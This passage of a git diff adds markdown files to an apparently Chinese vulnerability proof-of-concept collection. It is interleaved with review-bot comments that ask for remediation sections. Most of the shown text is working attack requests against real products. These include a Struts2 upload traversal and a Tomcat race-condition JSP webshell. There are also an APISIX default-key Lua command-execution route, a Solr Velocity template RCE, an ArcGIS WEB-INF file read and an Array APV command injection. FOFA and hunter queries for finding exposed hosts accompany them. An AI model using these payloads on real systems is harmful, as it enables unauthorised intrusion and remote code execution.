boundary=----WebKitFormBoundary5WJ61X4PRwyYKlip +Content-Length: 593 + +------WebKitFormBoundary5WJ61X4PRwyYKlip +Content-Disposition: form-data; name="upload"; filename="poc.txt" +Content-Type: text/plain + +test + + +------WebKitFormBoundary5WJ61X4PRwyYKlip +Content-Disposition: form-data; name="uploadFileName"; + +../../poc.txt + +------WebKitFormBoundary5WJ61X4PRwyYKlip-- + +``` + +``` +POST /untitled4_war_exploded/upload.action 
HTTP/1.1 +Host: localhost:8080 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Sec-Fetch-User: ?1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Content-Type: multipart/form-data; boundary=---------------------------299952630938737678921373326300 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Site: same-origin +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 +Sec-Fetch-Mode: navigate +Origin: http://localhost:8080 +Sec-Fetch-Dest: document +Cookie: JSESSIONID=4519C8974359B23EE133A5CEA707D7D0; USER_NAME_COOKIE=admin; SID_1=69cf26c6 +Referer: http://localhost:8080/untitled4_war_exploded/ +Content-Length: 63765 + +-----------------------------299952630938737678921373326300 +Content-Disposition: form-data; name="Upload"; filename="12.txt" +Content-Type: image/png + +111 +-----------------------------299952630938737678921373326300 +Content-Disposition: form-data; name="uploadFileName"; +Content-Type: text/plain + +../123.jsp +-----------------------------299952630938737678921373326300-- +``` +![image](https://github.com/wy876/POC/assets/139549762/afd588e7-f552-46bf-a2de-6c568d0fc1a2) + +- https://blog.csdn.net/qq_18193739/article/details/134935865 + diff --git a/Apache-Tomcat存在信息泄露漏洞(-CVE-2024-21733).md b/Apache-Tomcat存在信息泄露漏洞(-CVE-2024-21733).md new file mode 100644 index 0000000..145d4a9 --- /dev/null +++ b/Apache-Tomcat存在信息泄露漏洞(-CVE-2024-21733).md 
@@ -0,0 +1,38 @@ +## Apache Tomcat存在信息泄露漏洞( CVE-2024-21733) + +Apache Tomcat 信息泄露漏洞(CVE-2024-21733)情报。Apache Tomcat 是一个开源 Java Servlet 容器和 Web 服务器,用于运行 Java 应用程序和动态网页。Coyote 是 Tomcat 的连接器,处理来自客户端的请求并将它们传递Tomcat 引擎进行处理。攻击者可以通过构造特定请求,在异常页面中输出其他请求的body 数据,修复版本中通过增加 finally 代码块,保证默认会重设缓冲区 position 和 limit 到一致的状态,从而造成信息泄露。 + + +## 影响版本 +``` +从8.5.7到8.5.63 +9.0.0-M11到9.0.43 +``` + + +## poc +``` +POST / HTTP/1.1 +Host: hostname +Sec-Ch-Ua: "Chromium";v="119", "Not?A_Brand";v="24" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Linux" +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: none +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Accept-Encoding: gzip, deflate, br +Accept-Language: en-US,en;q=0.9 +Priority: u=0, i +Connection: keep-alive +Content-Length: 6 +Content-Type: application/x-www-form-urlencoded + +X +``` + +![image](https://github.com/wy876/POC/assets/139549762/15933e83-bb51-4d91-ba49-c31ab8d27cdb) + diff --git a/Apache-Tomcat条件竞争致远程代码执行漏洞(CVE-2024-50379).md b/Apache-Tomcat条件竞争致远程代码执行漏洞(CVE-2024-50379).md new file mode 100644 index 0000000..51995b3 --- /dev/null +++ b/Apache-Tomcat条件竞争致远程代码执行漏洞(CVE-2024-50379).md 
@@ -0,0 +1,209 @@ +# Apache-Tomcat条件竞争致远程代码执行漏洞(CVE-2024-50379) + +最近爆出 Apache Tomcat条件竞争导致的RCE,影响范围当然是巨大的,公司也及时收到了相关情报,于是老大让我复现,以更好的帮助公司进行修复漏洞。 + +复现难度其实并不大,但是成功率很低,我在复现过程中也尝试了很多tomcat、java版本,操作一样但结果不同,相信很多师傅也在复现,希望能够成功,所以我对“成功率”进行了一点点研究,希望能够提高师傅们复现成功的概率。 + +# 环境搭建 + +经过多次的尝试,建议大家使用java8不要用太高的java版本 否则难以复现成功(关注后台回复20241219可以获取跟我一样的漏洞复现环境和POC)这里使用的环境如下: + +``` +jre1.8.0_202 +apache-tomcat-9.0.63 +``` + +**windows虚拟机** + +配置环境变量 + +这里一定要配置JAVA_HOME否则会报错 + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311105830.webp) + +需要将这个版本的java的环境变量置顶,防止其他版本的干扰,大家应该都明白 + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311105783.webp) + +配置CATALINA_BASE + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311105591.webp) + +这下环境变量就已经配置齐了 这个时候就已经可以正常启动tomcat了 运行这个批处理文件 + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311105836.webp) + +启动成功(乱码无所谓的 web.xml改一下GBK即可) + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311105215.webp) + +# 漏洞分析 + +影响版本 + +11.0.0-M1 <= Apache Tomcat < 11.0.2 + +10.1.0-M1 <= Apache Tomcat < 10.1.34 + +9.0.0.M1 <= Apache Tomcat < 9.0.98 + +漏洞原理 + +首先来看看著名的**CVE-2017-12615**,我们查看tomocat的配置 (conf/web.xml) + +``` + + + default + / + + + + + jsp + *.jsp + *.jspx + +``` + +当请求的后缀为jsp或jspx的时候交由JSP servlet进行处理请求,此外交给default servlet进行处理请求。而我们查看**CVE-2017-12615**的payload可知,它对文件后缀采取了一些绕过,例如PUT一个1.jsp/、1.jsp空格、1.jsp%00从而绕过JSP servlet的限制,让default servlet来处理请求。当default servlet处理PUT请求时如下图 + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311105069.webp) + +```java + @Override + protected void doPut(HttpServletRequest req, HttpServletResponse resp) + throws ServletException, IOException { + + if (readOnly) { + sendNotAllowed(req, resp); + return; + } + + String path = getRelativePath(req); + + WebResource resource = resources.getResource(path); + + Range range = parseContentRange(req, resp); + + if (range == null) { + // 
Processing error. parseContentRange() set the error code + return; + } + + InputStream resourceInputStream = null; + + try { + // Append data specified in ranges to existing content for this + // resource - create a temp. file on the local filesystem to + // perform this operation + // Assume just one range is specified for now + if (range == IGNORE) { + resourceInputStream = req.getInputStream(); + } else { + File contentFile = executePartialPut(req, range, path); + resourceInputStream = new FileInputStream(contentFile); + } + + if (resources.write(path, resourceInputStream, true)) { + if (resource.exists()) { + resp.setStatus(HttpServletResponse.SC_NO_CONTENT); + } else { + resp.setStatus(HttpServletResponse.SC_CREATED); + } + } else { + resp.sendError(HttpServletResponse.SC_CONFLICT); + } + } finally { + if (resourceInputStream != null) { + try { + resourceInputStream.close(); + } catch (IOException ioe) { + // Ignore + } + } + } + } + +``` + +会去检查配置文件中的readonly的值是否为false,如果是true的话就直接return也就是不允许put请求,所以我们需要在配置文件中进行如下设置 (conf/web.cml) 注意是default servlet,因为上面讲了我们最终处理put请求是default servlet + +``` + + default + org.apache.catalina.servlets.DefaultServlet + + + debug + 0 + + + listings + false + + + readonly + false + + 1 + +``` + +最终就可以进行put上传shell了,这个就是**CVE-2017-12615**。 + +那么再看看最近很火的CVE-2024-50379。原理是条件竞争,通过并发put文件上传非标准后缀的“jsp”,并不断发起get请求一个标准后最的“jsp”文件,最终由于服务器的大小写不敏感,导致请求成功造成RCE。 + +看看pyload是put一个xxx.Jsp(也可以PUT html........),为什么长这样呢?阅读了上文,固然就明白了。 当然是要绕过jsp servlet的后缀匹配规则了然后让default servlet去处理请求。 + +现在我们尝试PUT一下 数据包如下 + +``` +PUT /test.Jsp HTTP/1.1 +Host: 192.168.19.135:8080 + +<% Runtime.getRuntime().exec("calc.exe");%> +``` + +返回状态码是201代表上传成功 可以去webapps/ROOT目录看到 + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311105018.webp) + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311106320.webp) + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311106484.webp) + +再次重放请求的时候就是204的状态码了  说明文件已经存在 
+ +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311106218.webp) + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311106369.webp) + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311106865.webp) + +# 漏洞复现 + +接下来开始复现该漏洞 我用的是window虚拟机 而不是真机,因为我电脑内存太大,可能效果不会很明显,毕竟要用到条件竞争,所以如果想成功率高一点建议用虚拟机,把内核、内存大小设置小一点。 + +yakit-发送到webFuzzer 发三个  get的并发线程建议大于前面两个 + +第一个 + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311106981.webp) + +第二个 + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311106377.webp) + +第三个  + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311106855.webp) + +开弹 + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311106630.webp) + +在我虚拟机卡的时候往往容易成功 有时候直接用yakit就能成功,有时候不行,所以我同时用yakit和脚步一起打  + +## 漏洞来源 +- https://mp.weixin.qq.com/s/d7dneaUgF2TD2KGdT1qiQw \ No newline at end of file diff --git a/ApacheAPISIX默认密钥漏洞(CVE-2020-13945).md b/ApacheAPISIX默认密钥漏洞(CVE-2020-13945).md new file mode 100644 index 0000000..d6f3563 --- /dev/null +++ b/ApacheAPISIX默认密钥漏洞(CVE-2020-13945).md 
@@ -0,0 +1,62 @@ +# Apache APISIX 默认密钥漏洞(CVE-2020-13945) + +# 一、漏洞简介 +Apache APISIX 是一个动态、实时、高性能的 API 网关,基于 Nginx 网络库和 etcd 实现, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。当使用者开启了Admin API,没有配置相应的IP访问策略,且没有修改配置文件Token的情况下,通过攻击管理员接口,即可使用script参数来插入任意LUA脚本并执行。 + +# 二、影响版本 ++ Apache APISIX 1.2—1.5 + +# 三、资产测绘 ++ hunter`app.name="APISIX"` ++ 特征 + +![1701951610416-3ffe8b1a-f818-46c3-90c2-9750d0c8c33a.png](./img/8VgmrJDcYVfiQISB/1701951610416-3ffe8b1a-f818-46c3-90c2-9750d0c8c33a-167144.png) + +![1701951623458-647668b0-2b49-4197-8fea-a196df8827aa.png](./img/8VgmrJDcYVfiQISB/1701951623458-647668b0-2b49-4197-8fea-a196df8827aa-935600.png) + +# 四、漏洞复现 +利用默认Token增加一个恶意的router,其中包含恶意LUA脚本: + +```plain +POST /apisix/admin/routes HTTP/1.1 +Host: xx.xx.xx.xx +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: en +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 +Connection: close +X-API-KEY: edd1c9f034335f136f87ad84b625c8f1 +Content-Type: application/json +Content-Length: 406 + +{ + "uri": "/attack", +"script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M", + "upstream": { + "type": "roundrobin", + "nodes": { + "example.com:80": 1 + } + } +} +``` + +访问刚才添加的router,就可以通过cmd参数执行任意命令 + +```plain +/attack?cmd=id +``` + +![1701951737969-45ca1cec-6fd1-44ab-9a55-cdbccf8bf568.png](./img/8VgmrJDcYVfiQISB/1701951737969-45ca1cec-6fd1-44ab-9a55-cdbccf8bf568-114498.png) + +# 五、修复建议 +1. 修改Apache APISIX配置文件中 conf/config.yaml 的admin_key,禁止使用默认Token + +2. 若非必要,关闭Apache APISIX Admin API功能,或者增加IP访问限制。 + +3. 升级Apache APISIX 至最新版本。 + + + +> 更新: 2024-02-29 23:57:33 +> 原文: \ No newline at end of file 
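Review bot: in `Apache-Seata存在Hessian反序列化漏洞(CVE-2024-22399).md` the intro says the flaw is fixed in 2.1.0 and 1.8.1, yet the file has no 影响版本 section like the other entries and no 修复建议 at all; add both (upgrade to 2.1.0 / 1.8.1 and keep the 8091 RPC port off untrusted networks) so the entry is usable for remediation and not only for reproduction. In the Java listing, `javax.activation.MimeTypeParameterList` was removed from the JDK in Java 11, so `SeataPoc` only compiles on Java 8 or with the `javax.activation` artifact on the classpath; state that assumption next to the listing. `HessianEncoder.encode` catches every `Throwable` and only does `System.out.println(var12)`, which hides encoding failures behind a silent "no effect" run; rethrow or at least log the stack trace.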
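Review bot: `Apache-Solr身份认证绕过导致任意文件读取漏洞复现(CVE-2024-45216).md` gives the 影响版本 ranges but never the remediation; since the ranges stop at 8.11.4 and 9.7.0, state explicitly that upgrading to those releases closes the bypass. The second request, `{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}`, is a persistent change to the core's configuration rather than a read-only probe: the text should say it must be reverted after testing, and that a `POST …/config` whose path carries a `:/admin/info/key` suffix, or any request turning on `enableRemoteStreaming`, is what defenders should look for in their access logs. `core名称` inside otherwise literal HTTP request lines should be marked as a placeholder the way the nuclei template later in this patch marks `{{Hostname}}`, so it is not copied verbatim.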
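Review bot: `Apache-Spark命令执行漏洞(CVE-2023-32007).md` contradicts itself on versions: the 介绍 paragraph says 3.4.0 之前版本 are affected while 漏洞版本 says `3.1.1 <= Apache Spark < 3.2.2`; pick one and cite the advisory it comes from. The 利用条件 line ("启用 ACL,且低权限") is vague; what the intro actually describes is that `spark.acls.enable` is on and the `HttpSecurityFilter` impersonation path is reached, which is why the `doAs` value matters. The `GET /jobs/?doAs=…` line embeds a specific dnslog.cn callback host and a lab IP (`10.211.55.7:4040`); replace both with placeholders so the request is not replayed against someone else's callback domain. A 修复建议 (upgrade past the affected range) is missing.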
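Review bot: in `Apache-Struts2-CVE-2023-50164.md` the opening paragraph says the "Always delete uploaded file" commit 确保上传的临时文件被正确上传, which contradicts the commit's own name (the file is deleted, not uploaded), and the sentence then stops at a semicolon without ever explaining the second commit ("Makes HttpParameters case-insensitive"), although that is the change the `uploadFileName` requests depend on; finish the paragraph. The first two requests both declare `Content-Length: 593` while one body expands `{{randstr(4097,4097)}}`, so they only work in a tool that recomputes the header; say so. The third request carries what looks like a real session (`JSESSIONID=4519C8…`, `USER_NAME_COOKIE=admin`) and a `Content-Length: 63765` that does not match its short body; strip the cookies and fix or drop the header. The file also lacks the 影响版本 and 修复建议 sections its neighbours have.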
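Review bot: the description in `Apache-Tomcat存在信息泄露漏洞(-CVE-2024-21733).md` runs the fix into the cause: "修复版本中通过增加 finally 代码块,保证默认会重设缓冲区 position 和 limit 到一致的状态,从而造成信息泄露" reads as if the finally block causes the leak. Split it: an incomplete POST (declared `Content-Length` larger than the body actually sent) leaves the Coyote input buffer in an inconsistent state, so the error page can echo bytes belonging to another request; the fix adds a finally block that resets position and limit. The poc shows exactly this (`Content-Length: 6` with the one-byte body `X`), but the text never points it out, so a reader cannot tell which part of the request matters. Add a 修复建议: the 影响版本 ranges end at 8.5.63 and 9.0.43, so upgrade to 8.5.64 / 9.0.44 or later.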
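Review bot: in `Apache-Tomcat条件竞争致远程代码执行漏洞(CVE-2024-50379).md` both `conf/web.xml` listings have lost their XML markup (only the text nodes `default`, `/`, `jsp`, `*.jsp`, `*.jspx`, `readonly`, `false` survive), so the servlet-mapping and init-param structure the explanation relies on is invisible; restore the elements and fence them as ```xml. The precondition is buried in the analysis: the race is only reachable when the default servlet's `readonly` init-param is set to the non-default `false` and the filesystem is case-insensitive (the author's Windows VM), which belongs up front next to 影响版本. "conf/web.cml", "tomocat", "pyload" and "标准后最" are typos. 修复建议 is missing entirely: upgrade to the fixed releases the ranges imply (11.0.2 / 10.1.34 / 9.0.98), keep `readonly` at its default, and, per the Tomcat advisory, on Java 8 or 11 explicitly set `sun.io.useCanonCaches=false` (it defaults to true there); that default is also why the author found Java 8 the easiest environment to reproduce on, which is worth saying instead of "不要用太高的java版本".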
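Review bot: `ApacheAPISIX默认密钥漏洞(CVE-2020-13945).md` is the only entry in this batch with a 修复建议 section, but it never connects the fix to the poc: say explicitly that `X-API-KEY: edd1c9f034335f136f87ad84b625c8f1` is the default `admin_key` from `conf/config.yaml` that item 1 tells operators to rotate, and that item 2's IP restriction is the `allow_admin` list in the same file. The poc's upstream node `example.com:80` and the `/attack` URI are arbitrary; mark them as such so readers know they are not part of the vulnerability.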
diff --git a/ApacheSolrVelocity模版注入远程命令执行漏洞(CVE-2019-17558).md b/ApacheSolrVelocity模版注入远程命令执行漏洞(CVE-2019-17558).md new file mode 100644 index 0000000..ea18c48 --- /dev/null +++ b/ApacheSolrVelocity模版注入远程命令执行漏洞(CVE-2019-17558).md 
@@ -0,0 +1,81 @@ +# Apache Solr Velocity模版注入远程命令执行漏洞(CVE-2019-17558) + +# 一、漏洞简介 +`Apache Solr`是`Apache Lucene`项目的开源企业搜索平台。其主要功能包括全文检索、命中标示、分面搜索、动态聚类、数据库集成以及富文本的处理。`Apache Solr`存在模版注入漏洞。攻击者通过未授权访问`Solr`服务器,发送特定的数据包开启`params.resource.loader.enabled`,而后get访问接口导致远程命令执行漏洞 + +## 二、影响版本 ++ `Apache Solr 5.0.0~8.3.1` + +# 三、资产测绘 ++ hunter`app.name="Solr"` ++ 登录页面 + +![1693661111137-6bda495c-39b5-4f89-b54a-8fda4d74b3fd.png](./img/-2GTgOX_-wpT2ukM/1693661111137-6bda495c-39b5-4f89-b54a-8fda4d74b3fd-916775.png) + +# 四、漏洞复现 +1. 默认情况下`params.resource.loader.enabled`配置未打开,无法使用自定义模版,可以通过api获取所有核心core + +```java +GET /solr/admin/cores?indexInfo=false&wt=json HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +``` + +![1693661185287-f2301704-3803-452d-8ba5-0db27d594d85.png](./img/-2GTgOX_-wpT2ukM/1693661185287-f2301704-3803-452d-8ba5-0db27d594d85-040330.png) + +2. 
启用配置`params.resource.loader.enabled`,其中API路径包含刚才获取的core名称 + +```java +POST /solr/class/config HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/json +Content-Length: 259 + +{ + "update-queryresponsewriter": { + "startup": "lazy", + "name": "velocity", + "class": "solr.VelocityResponseWriter", + "template.base.dir": "", + "solr.resource.loader.enabled": "true", + "params.resource.loader.enabled": "true" + } +} +``` + +![1693661211872-b2d5c27e-f9c2-425f-be37-517c12f54277.png](./img/-2GTgOX_-wpT2ukM/1693661211872-b2d5c27e-f9c2-425f-be37-517c12f54277-144560.png) + +3. 查询`params.resource.loader.enabled`是否开启 + +![1693661505022-777ef604-c59f-4e9e-a649-8f14934e807f.png](./img/-2GTgOX_-wpT2ukM/1693661505022-777ef604-c59f-4e9e-a649-8f14934e807f-351305.png) + +4. 
通过注入Velocity模板即可执行任意命令 + +```java +GET /solr/class/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +``` + +![1693661647398-287f7ec3-998e-4681-920d-77ea1cd545df.png](./img/-2GTgOX_-wpT2ukM/1693661647398-287f7ec3-998e-4681-920d-77ea1cd545df-570598.png) + + + +> 更新: 2024-02-29 23:57:33 +> 原文: \ No newline at end of file diff --git a/Appium-Desktop-CVE-2023-2479漏洞.md b/Appium-Desktop-CVE-2023-2479漏洞.md new file mode 100644 index 0000000..25833e2 --- /dev/null +++ b/Appium-Desktop-CVE-2023-2479漏洞.md @@ -0,0 +1,14 @@ +## Appium Desktop CVE-2023-2479漏洞 + +appium-desktop 是 Appium 服务器的图形界面,也是一个应用程序检查器 + +由于用户输入审查不当,此软件包的受影响版本容易受到命令注入的攻击,允许攻击者设置反向 shell。 + + +## poc +``` +http://127.0.0.1/?xss= + +http://127.0.0.1/?url= + +``` diff --git a/ArcGIS地理信息系统任意文件读取漏洞.md b/ArcGIS地理信息系统任意文件读取漏洞.md new file mode 100644 index 0000000..f3df380 --- /dev/null +++ b/ArcGIS地理信息系统任意文件读取漏洞.md 
@@ -0,0 +1,23 @@ +# ArcGIS地理信息系统任意文件读取漏洞 + +ArcGIS地理信息系统 存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件。 + +## fofa + +```javascript +app="esri-ArcGIS" +``` + +## poc + +```javascript +GET /arcgis/manager/3370/js/../WEB-INF/web.xml HTTP/1.0 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![image-20241106172857303](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061728383.png) \ No newline at end of file diff --git a/Array-APV应用交付系统ping_hosts存在任意命令执行漏洞.md b/Array-APV应用交付系统ping_hosts存在任意命令执行漏洞.md new file mode 100644 index 0000000..79f7738 --- /dev/null +++ b/Array-APV应用交付系统ping_hosts存在任意命令执行漏洞.md @@ -0,0 +1,26 @@ +# Array-Networks-APV应用交付系统ping_hosts存在任意命令执行漏洞 + +Array Networks APV应用交付系统 /rest/ping_hosts 接口存在远程命令执行漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。该漏洞利用难度较低,建议受影响的用户尽快修复。 + +## fofa + +```javascript +app="Array-APV" && title=="Login" +``` + +## poc + +```javascript +POST /restapi/../rest/ping_hosts HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Connection: keep-alive + +["127.0.0.1| echo `whoami` received 2 3 4"]=1&csrfmiddlewaretoken=cXLnOdGshlksqOG0Ubnn4SlBvO8zOdWW +``` + +![image-20240913223135601](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409132231693.png) \ No newline at end of file 
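Review bot: in `ApacheSolrVelocity模版注入远程命令执行漏洞(CVE-2019-17558).md` step 2 says the API path must contain the core name obtained in step 1, yet the requests hardcode `/solr/class/config` and `/solr/class/select` from the author's lab; use a placeholder so readers do not copy `class` literally. Heading levels are inconsistent (`## 二、影响版本` between `# 一、` and `# 三、`), and the HTTP requests are fenced as ```java where other entries use ```plain. The step 2 config change (`solr.resource.loader.enabled` and `params.resource.loader.enabled` set to `true`) is persistent on the target and is exactly the setting defenders should audit; the write-up should say it must be reverted after testing and add a 修复建议 (upgrade to 8.4.0 or later, given the 5.0.0~8.3.1 range).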
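Review bot: the poc block in `Appium-Desktop-CVE-2023-2479漏洞.md` contains only two URL stems with empty parameters (`http://127.0.0.1/?xss=` and `http://127.0.0.1/?url=`), so it documents nothing a reader can verify or a defender can match on; either the payloads were lost when the file was written and need restoring from the source, or the block should be replaced by a sentence naming the parameters involved. The entry also has no 影响版本 and no reference link, unlike the surrounding files.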
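Review bot: `ArcGIS地理信息系统任意文件读取漏洞.md` has no 影响版本, vendor reference or 修复建议. The request line `/arcgis/manager/3370/js/../WEB-INF/web.xml` is a plain `..` traversal into `WEB-INF`; state that, since an unnormalised `..` segment reaching `WEB-INF` is what to match in access logs and `WEB-INF` must never be reachable through a static path. `HTTP/1.0` together with a `Host:` header is unusual; `HTTP/1.1` matches the other entries.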
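Review bot: `Array-APV应用交付系统ping_hosts存在任意命令执行漏洞.md` and the `Array-Networks-APV…` file that follows describe the same `/rest/ping_hosts` injection with the same request; keep one and have the other link to it, otherwise the two will drift apart. "未经身份攻击者" is missing 验证. `csrfmiddlewaretoken=cXLnOdGshlksqOG0Ubnn4SlBvO8zOdWW` is a token captured from one session and will not be valid elsewhere; mark it as a placeholder. The `/restapi/../rest/ping_hosts` prefix suggests the authentication check is bound to `/restapi/` and defeated by path normalisation; confirm that and say so, because the unnormalised `..` reaching `/rest/` is the detectable part. No 影响版本 beyond the product name and no 修复建议 are given.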
diff --git a/Array-Networks-APV应用交付系统ping_hosts存在任意命令执行漏洞.md b/Array-Networks-APV应用交付系统ping_hosts存在任意命令执行漏洞.md new file mode 100644 index 0000000..848d9af --- /dev/null +++ b/Array-Networks-APV应用交付系统ping_hosts存在任意命令执行漏洞.md @@ -0,0 +1,37 @@ +# Array-Networks-APV应用交付系统ping_hosts存在任意命令执行漏洞 + +# 一、漏洞简介 +Array Networks APV应用交付系统 /rest/ping_hosts 接口存在远程命令执行漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。该漏洞利用难度较低,建议受影响的用户尽快修复. + +# 二、影响版本 ++ Array APV + +# 三、资产测绘 ++ fofa`app="Array-APV" && title=="Login"` ++ 特征 + +![1726293906133-59539fc8-cda4-4f9f-82de-3b0706541ee4.png](./img/f_WgzfyB4eIEXb7f/1726293906133-59539fc8-cda4-4f9f-82de-3b0706541ee4-291132.png) + +# 四、漏洞复现 +```java +POST /restapi/../rest/ping_hosts HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 +Content-Type: application/x-www-form-urlencoded +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: keep-alive +Content-Length: 98 + +["127.0.0.1| echo `whoami` received 2 3 4"]=1&csrfmiddlewaretoken=cXLnOdGshlksqOG0Ubnn4SlBvO8zOdWW +``` + +![1726293935346-e551c4a1-2a2b-4c39-9442-7b5fb3509fc8.png](./img/f_WgzfyB4eIEXb7f/1726293935346-e551c4a1-2a2b-4c39-9442-7b5fb3509fc8-517338.png) + + + + + +> 更新: 2024-10-22 09:40:53 +> 原文: \ No newline at end of file diff --git a/Array-VPN任意文件读取漏洞.md b/Array-VPN任意文件读取漏洞.md new file mode 100644 index 0000000..b6ccd0f --- /dev/null +++ b/Array-VPN任意文件读取漏洞.md 
